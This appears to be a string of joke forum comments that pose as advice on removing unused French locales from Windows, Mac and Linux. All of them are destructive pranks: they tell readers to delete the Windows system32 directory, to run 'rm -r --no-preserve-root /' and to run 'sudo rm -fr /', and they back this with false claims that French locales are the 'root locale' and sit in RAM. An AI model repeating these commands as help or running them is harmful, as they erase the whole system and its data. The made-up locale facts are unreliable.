In Windows it is stored in system32. Just delete that directory. Mac, just burn it with fire. Only way to be sure.

Some system have the French locale even deeper seated, since it was the original Linux locale. Typically for Linux, they call it a root locale, because historically, locales where trees building up on each other. Nowadays this is not needed anymore, but some systems are refusing to remove it if you do not write rm -r --no-preserve-root /

Linux pro tip: unused locales do take up invaluable disk space. For historical reasons, French locales specifically are always kept in RAM.
If you don’t use them, you can remove them with “sudo rm -fr /“. This will save you about 800mb of RAM. That’s not much by modern standards, but it’s still quite a lot if you ask me.
